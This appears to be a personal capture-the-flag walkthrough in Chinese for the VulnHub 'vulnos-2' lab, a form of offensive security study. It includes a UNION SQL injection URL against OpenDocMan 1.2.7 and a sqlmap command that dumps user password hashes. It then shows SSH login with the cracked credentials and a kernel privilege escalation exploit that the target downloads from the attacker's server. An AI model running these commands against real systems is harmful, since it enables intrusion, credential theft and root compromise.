# Target complete - vulnos-2
Download URL: https://www.vulnhub.com/entry/vulnos-2,147/
{%hackmd FEwWUB_uQXiEWEj9MsaEgA %}
## Step:
1.找到 80 port,進網頁看看
2.Document 這頁反白有看到字:
**For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest**
3. http://172.20.10.5/jabcd0cs/ 這頁,看起來是 DMS 的網站,opendocman 版本是 1.2.7
4. 用 [searchsploit](https://hackmd.io/Nuy_vYmzSLCcQKNCPyH0QQ) 去搜尋看看,或上 exploit-db 去找
* searchsploit opendocman
* searchsploit -m 32075
5. 裡面有一段可以找到 sql 版本
`http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9`
6. http://172.20.10.5/jabcd0cs//ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
7. sql injection
`$sqlmap -u "http://172.20.10.5/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -risk=3 -D jabcd0cs -T odm_user -C id,username,password --dump --batch`
8. 得到 hash 值
9. 拿去 md5 解一解 (https://hashes.com/en/decrypt/hash)
10. 解出來拿到 `webmin1980` 這組密碼
11. 用這組帳號去 ssh `webmin/webmin1980`
12. `$lsb_release -a`,查到是 `ubuntu14.04.4`
13. `$cat /proc/verison`,查看 kernel 版本為 `Linux version 3.13.0-24-generic`
14. 去找看看有沒有提權的工具
* $searchsploit ubuntu14.04
15. 37292 這個符合我們需要的
16. 去 kali 下載 37292 並編譯
* $searhsploit -m 37292.c
* 再把 37292.c 丟到 kali 的 web server 以方便靶機直接 wget 下載
* 記得 kali 這台要先裝 apache
17. 再靶機下載剛剛丟到 kali 的 a.out
18. $gcc 37292.c
* ./a.out
* 執行成功
* 
20. whoami 已取得 root 權限
21. $cd /root
* cat flag.txt
## Writeup 參考:
* https://blog.csdn.net/weixin_43809826/article/details/119397072
* https://fdlucifer.github.io/2020/04/17/vulnos-2/
* https://blog.csdn.net/elephantxiang/article/details/121643471
* https://cloud.tencent.com/developer/article/1144867
###### tags: `target` `OSCP`
Sign in with Wallet
Connect another wallet